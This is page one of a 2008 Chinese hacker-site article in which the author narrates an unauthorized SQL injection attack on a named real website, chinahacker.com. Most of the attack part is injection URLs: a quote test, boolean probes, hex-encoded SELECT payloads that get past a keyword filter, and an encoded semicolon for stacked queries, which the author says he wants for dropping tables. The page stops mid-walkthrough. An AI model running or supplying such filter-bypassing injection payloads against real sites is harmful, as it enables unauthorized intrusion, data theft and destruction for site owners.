| 网站首页 | 资讯 | Hack | 漏洞 | 网管 | 编程 | 培训 | 品黑页 | 软件 | 论坛 | 动画 | 视频 | 经典 | 教学站 | 黑客点睛 | 
服务导航 我要发布 主力频道 空间域名 精华收集 服务器出租 黑客培训 光盘刻录 特色服务 解决方案 我要投诉
您现在的位置: 华夏黑客同盟 >> Hack >> 脚本漏洞攻击 >> 正文 用户登录 新用户注册
第三次注入黑客联盟         ★★★ 【字体:
第三次注入黑客联盟
作者:小生 文章来源:网嗅安全网 点击数: 更新时间:2008-2-15

  帮黑夜找一个工具,又去了黑客基地看了一眼,我晕,又是枫三少的照片挂在上面(n年前就是这样了,三少,挂照片好爽?^-^),我倒!看看黑基有什么注入漏洞先。我找啊找,找到了论坛。看到一个叫《[原创]对中国黑客联盟的二次渗透》,是某人写的。我直觉告诉我,这个什么中国黑客联盟应该还有漏洞(别丢鸡蛋,我很少去这样的站)。已经被人黑了2次了,也不差我了吧。我再来!

  地址

  http://www.chinahacker.com/article/list.asp?id=891

  测试开始吧。

  测试一:

  http://www.chinahacker.com/article/list.asp?id=891’

  返回:你提交的数据有错,不要老喜欢搞我啦,Kender留言

  个人判断:过滤了’

  测试二:

  http://www.chinahacker.com/article/list.asp?id=891%20and%201=1

  返回:正常

  个人判断:应该可以去死了,只过滤了’。

  而且是mssql的数据库,我最喜欢。然后我想可能还过滤了select之类的吧。这次真是好玩。我想了想用16进制,这里我用了一个工具,是裤衩写的HEXSQL。由于枫三少已经写了有article表了,我是一个很懒的人。提交如下:

  http://www.chinahacker.com/article/list.asp?id=891%20and%20%28%73%65%6C%65%63%74%20%63%6F%75%6E%74%28%2A%29%20%46%72%6F%6D%20%61%72%74%69%63%6C%65%29%3E%30

  其实就是

  http://www.chinahacker.com/article/list.asp?id=891 and (select count(*) from article)>0

  返回正常,我是个很喜欢drop表的人来的。看看;能不能先

  http://www.chinahacker.com/article/list.asp?id=891;

  oh,shit,过滤了。再来一下先。

  http://www.chinahacker.com/article/list.asp?id=891%3B,又可以了。

  提醒黑客联盟一下吧。这里更好玩!

  http://www.chinahacker.com/soft/show.asp?id=401%20and%20%28%73%65%6C%65%63%74%20%63%6F%75%6E%74%28%2A%29%20%46%72%6F%6D%20%61%72%74%69%63%6C%65%29%3E%30

  玩认真的了。

  连接用户:

  %20and%20%75%73%65%72%3E%30代表 and user>0

  返回

[1] [2] 下一页

责任编辑:朱倩  联系方式  Email:朱倩
电话:51228163
  • 上一篇黑客:

  • 下一篇黑客:
  • (只显示最新5条。评论内容只代表网友观点,与本站立场无关!)
    姓 名:
    * 游客填写  ·注册用户
    主 页:
    评 分:
    1分 2分 3分 4分 5分
    评论内容:
    验证码: *
  • 请遵守《互联网电子公告服务管理规定》及中华人民共和国其他各项有关法律法规。
  • 严禁发表危害国家安全、损害国家利益、破坏民族团结、破坏国家宗教政策、破坏社会稳定、侮辱、诽谤、教唆、淫秽等内容的评论 。
  • 用户需对自己在使用本站服务过程中的行为承担法律责任(直接或间接导致的)。
  • 本站管理员有权保留或删除评论内容。
  • 评论内容只代表网友个人观点,与本网站立场无关。
  • 最新hack更新
    最新推荐资讯
    相关黑客
    EditPlus查找注入表达式
    破解SQL自动注入猜解机
    Asp.net注入台湾站
    我常用的一些注入命令
    对快递公司一次艰难注入
    informix的注入整理
    手工注入电科大网络学堂
    角色注入直接获系统权限
    注入必备:Cookie与联合查询
    注入的限制绕过
    最新会员软件
    最新推荐视频
    最新推荐动画

    Copyright @ 2005 77169.Net Inc. All rights reserved. 华夏黑客同盟 版权所有
    北京市电信通提供网络带宽

    mailto:webmaster@77169.net
    咨询QQ号:836982 / 59280880
    联系站长 QQ38588913
    热线电话: 86-10-67634029/676229433
    京ICP证041431号